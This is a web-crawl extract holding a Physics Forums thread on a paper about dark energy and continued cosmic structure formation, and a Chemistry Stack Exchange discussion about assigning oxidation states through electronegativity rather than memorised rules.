{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9239084720611572, "perplexity": 232.1781473477266}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-09/segments/1550247496855.63/warc/CC-MAIN-20190220230820-20190221012820-00445.warc.gz"}
https://www.physicsforums.com/threads/dark-energy-myths-and-reality.244790/
# Dark energy myths and reality 1. Jul 13, 2008 ### wolram arXiv:0807.1635 [ps, pdf, other] Title: Dark energy: myths and reality Authors: V.N. Lukash (Astro Space Centre of P.N. Lebedev Physical Institute, Moscow, Russia), V.A. Rubakov (Institute for Nuclear Research, Moscow, Russia) Journal-ref: Physics-Uspekhi 51 (3), pp. 283-289 (2008) Subjects: Astrophysics (astro-ph) We discuss the questions related to dark energy in the Universe. We note that in spite of the effect of dark energy, large-scale structure is still being generated in the Universe and this will continue for about ten billion years. We also comment on some statements in the paper "Dark energy and universal antigravitation" by A.D. Chernin [4]. 2. Jul 13, 2008 ### jonmtkisco Hi wolram, Nice paper from Lukash & Rubakov, thanks for bringing it to our attention. It sure throws cold water on Chernin's conclusions. Unusually strong criticism. If I understand the gist of the paper, it is saying that large-scale structure formation can continue for another 10 Gy or so into the future, despite the retarding influence of dark energy. So for example, even if most superclusters are currently expanding, their expansion rate may have already slowed sufficiently that it is possible they will experience true gravitational collapse some Gy in the future, when their expansion rate actually turns negative. So in that sense a supercluster might be considered "gravitationally bound" at present even though most of its galaxies are currently moving farther apart. An interesting point to keep in mind when interpreting Integrated Sachs-Wolfe observations. Although Lukash & Rubakov want to keep the door open for quintessence and higher-dimensional theories of dark energy, that section seems like a fairly cursory tangent away from their main point. Jon
2018-05-23 13:23:56
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.25291338562965393, "perplexity": 2822.057344848395}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-22/segments/1526794865651.2/warc/CC-MAIN-20180523121803-20180523141803-00039.warc.gz"}
https://chemistry.stackexchange.com/questions/10944/electronegativity-considerations-in-assigning-oxidation-states
# Electronegativity Considerations in Assigning Oxidation States I have never seen anything other than a set of rules like these when textbooks present how to assign oxidation numbers. Such as these (a table of assignment rules, shown as an image in the original post). However, if we keep in mind that oxidation numbers are simply fictitious numbers which suppose all bonding to be ionic - i.e. no electron sharing - and if we keep in mind simply relative electronegativity, we can easily work out the oxidation state of any element in any compound. For example, take water. Bonding order: $\ce{H-O-H}$. Oxygen has two lone pairs. Oxygen is more electronegative than hydrogen. So we suppose that oxygen takes both electrons in both bonding pairs. Oxygen has 8 electrons assigned to it. Its valence is 6. 6-8 is -2; oxygen has two more electrons assigned to it than its valence electron count, so naturally its oxidation state is -2. No rules needed. Now hydrogen peroxide. $\ce{H-O-O-H}$. Here we have an oxygen-oxygen bond, so in this case neither element wins the electronegativity battle. The bonding electrons are split evenly between the two oxygens. However, since the oxygens are much more electronegative than the hydrogens, we assign both electrons in both the $\ce{O-H}$ bonding pairs to oxygen. Each oxygen has 7 electrons assigned to it; oxygen has a valence of 6; oxidation state: -1. No need to memorize exceptions as stated in the table above. We could go on. However, I am curious: 1) Has anyone been taught to assign oxidation states this way? 2) If not, what do you think of this method? • I have; the table came afterwards as an aid to quickly assign alkali and alkaline earth metals, oxygen and halides. – LDC3 May 20 '14 at 3:16 • I don't think I was taught that way but it's the way I use. I think oxidation numbers are a lot easier than how they are taught in high school. – canadianer May 20 '14 at 4:41 • I agree. Memorization is crap. EN isn't that hard, and I remember I was taught to memorize the EN trend in high school. However, we were still taught how to assign oxidation numbers through memorizing a bunch of rules. Unfortunate that teachers can't put two and two together. – Dissenter May 20 '14 at 4:53 The electronegativity battle scheme is most helpful for all kinds of compounds since it is the most generic way to derive oxidation states. The table represents just a cheat sheet that might be very helpful in the beginning. If you spend most of your time with chemistry, this table will be present as some sort of muscle memory - usually referred to as chemical intuition. The IUPAC defines oxidation states in their goldbook as follows: A measure of the degree of oxidation of an atom in a substance. It is defined as the charge an atom might be imagined to have when electrons are counted according to an agreed-upon set of rules: 1. the oxidation state of a free element (uncombined element) is zero; 2. for a simple (monatomic) ion, the oxidation state is equal to the net charge on the ion; 3. hydrogen has an oxidation state of 1 and oxygen has an oxidation state of -2 when they are present in most compounds. (Exceptions to this are that hydrogen has an oxidation state of -1 in hydrides of active metals, e.g. $\ce{LiH}$, and oxygen has an oxidation state of -1 in peroxides, e.g. $\ce{H2O2}$); 4. the algebraic sum of oxidation states of all atoms in a neutral molecule must be zero, while in ions the algebraic sum of the oxidation states of the constituent atoms must be equal to the charge on the ion.
For example, the oxidation states of sulfur in $\ce{H2S}$, $\ce{S8}$ (elementary sulfur), $\ce{SO2}$, $\ce{SO3}$, and $\ce{H2SO4}$ are, respectively: -2, 0, +4, +6 and +6. The higher the oxidation state of a given atom, the greater is its degree of oxidation; the lower the oxidation state, the greater is its degree of reduction. What we see is that your table actually reflects some of these rules. However, this set is not generic at all, and it lacks a definition for species that contain neither oxygen nor hydrogen and are neither free elements nor monatomic ions. With only these rules it is impossible to determine the oxidation states for $\ce{BF3}$ and [many]$_{n~(n\to\infty)}$ compounds. This gap in the definition is very well known - but not surprisingly the IUPAC has not changed the official set. Hans-Peter Loock proposed a much simpler concept in Expanded Definition of the Oxidation State: The oxidation state of an atom in a compound is given by the hypothetical charge of the corresponding atomic ion that is obtained by heterolytically cleaving its bonds such that the atom with the higher electronegativity in a bond is allocated all electrons in this bond. Bonds between like atoms (having the same formal charge) are cleaved homolytically. This is not a new definition, but it predates the IUPAC rules by several decades. For example, Linus Pauling provided a similar definition of the oxidation state in his 1947 edition of General Chemistry (3). (3): Pauling, L. General Chemistry; Freeman: San Francisco, CA, 1947; republished by Courier Dover Publications, 2012. So to me it is completely unclear why IUPAC has chosen a different definition. • I reused that for the tag-wiki entry oxidation-state. – Martin - マーチン May 20 '14 at 6:43 • Thank you. It is unclear to me as well why the IUPAC definition is this vague. – Dissenter May 20 '14 at 17:40 My apologies for bumping an old question; however I'm not sure that the accepted answer provides an adequate answer to the stated question: 1) Has anyone been taught to assign oxidation states this way? 2) If not, what do you think of this method? For part 1, I can say personally that I use this method in teaching a 3rd year Inorganic Chemistry course. It is covered in Rayner-Canham's Descriptive Inorganic Chemistry textbook (Chapter 8 of the 5th edition). After teaching this method for a number of years, I have anecdotal evidence that students get a better understanding of what the oxidation state is, and when it is suitable to use this type of electron bookkeeping instead of formal charge (for example). In addition to relying on a periodic trend as opposed to a list of rules, this method helps to explain the differences in the oxidation numbers of inequivalent atoms in ions/molecules (such as sulfur in $\ce{S2O3^2-}$), which can't be done with the list-of-rules approach. For part 2 of the question, the biggest drawback of using the electronegativity approach to determining oxidation numbers is that it requires a knowledge of Lewis dot structures. With the current (American) General Chemistry track, students learn about oxidation numbers prior to drawing structures, and therefore must be taught using the list-of-rules approach.
I suspect a shuffling of the content to allow students to use the electronegativity approach would have some pedagogical benefits; instead of sitting at the bottom of Bloom's Taxonomy by remembering a list of rules, we can move up to applying the electronegativity trends to analyze the degree of electron deficiency an atom has in an ion or molecule. • I do not understand your last paragraph. Are you saying that students learn how to assign oxidation numbers before learning about the structure of the molecule which they are assigning the oxidation numbers to? How can that approach even remotely work? – Martin - マーチン Jul 16 '15 at 9:00 • @Martin-マーチン students typically learn how to determine the oxidation number of atoms in polyatomic ions based on the "rules". They know the chemical formula of the ion, but they have not encountered Lewis dot structures. So they can use the rules to determine that the N in nitrate has an oxidation state of +5 before they learn how to determine whether it is trigonal pyramidal or trigonal planar. – bobthechemist Jul 16 '15 at 11:56 • But then I don't see how considering the electronegativity instead of the rules would change anything. The procedure mostly stays the same. – Martin - マーチン Jul 16 '15 at 12:24 • @Martin-マーチン That's my point: gen chem students learn all that is needed to apply electronegativity to ox number assignments, just in the wrong order. Therefore, it is only useful (with the current standard US curriculum) later on in the chemistry program. – bobthechemist Jul 16 '15 at 14:29 • I don't want to go into a deep conversation about the topic in the comments, but I really do not understand. What is the wrong order? Do students learn the set of rules to assign ox numbers prior to electronegativity? I just want to understand why there is a problem teaching the far superior approach instead of a fixed and incomplete set of rules. I am not even starting to question that they are taught a concept of bookkeeping of electrons before learning about molecular structures. If you want to talk about this, consider creating a chat room where we can talk. – Martin - マーチン Jul 16 '15 at 14:53
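As a supplementary illustration (not part of the original thread): the electron bookkeeping described in the question above is mechanical enough to script. The following minimal Python sketch is a toy under stated assumptions - the molecule encodings, the function name, and the two-element electronegativity table are all illustrative - but it implements exactly the battle scheme: each bonding pair goes to the more electronegative atom, ties are split homolytically, and the oxidation state is the valence electron count minus the electrons assigned.

# Toy implementation of the "electronegativity battle" bookkeeping (illustrative).
EN = {"H": 2.20, "O": 3.44}    # Pauling electronegativities
VALENCE = {"H": 1, "O": 6}     # valence electron counts

def oxidation_states(atoms, bonds, lone_pairs):
    """atoms: {atom_id: element}; bonds: list of (id_a, id_b) single bonds;
    lone_pairs: {atom_id: number of lone pairs on that atom}."""
    # Lone-pair electrons always stay with their own atom.
    assigned = {i: 2 * lone_pairs.get(i, 0) for i in atoms}
    for a, b in bonds:
        ea, eb = EN[atoms[a]], EN[atoms[b]]
        if ea > eb:
            assigned[a] += 2   # more electronegative atom takes both electrons
        elif eb > ea:
            assigned[b] += 2
        else:
            assigned[a] += 1   # tie (e.g. O-O in peroxide): split homolytically
            assigned[b] += 1
    # Oxidation state = valence electrons minus electrons assigned to the atom.
    return {i: VALENCE[atoms[i]] - assigned[i] for i in atoms}

# Water, H-O-H, two lone pairs on oxygen:
print(oxidation_states({1: "H", 2: "O", 3: "H"}, [(1, 2), (2, 3)], {2: 2}))
# -> {1: 1, 2: -2, 3: 1}

# Hydrogen peroxide, H-O-O-H, two lone pairs on each oxygen:
print(oxidation_states({1: "H", 2: "O", 3: "O", 4: "H"},
                       [(1, 2), (2, 3), (3, 4)], {2: 2, 3: 2}))
# -> {1: 1, 2: -1, 3: -1, 4: 1}

Running it reproduces the worked examples: water gives oxygen an oxidation state of -2, hydrogen peroxide gives each oxygen -1, and every hydrogen comes out +1.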
2019-04-23 07:56:58
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6587880253791809, "perplexity": 834.2486146921112}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-18/segments/1555578596541.52/warc/CC-MAIN-20190423074936-20190423100936-00479.warc.gz"}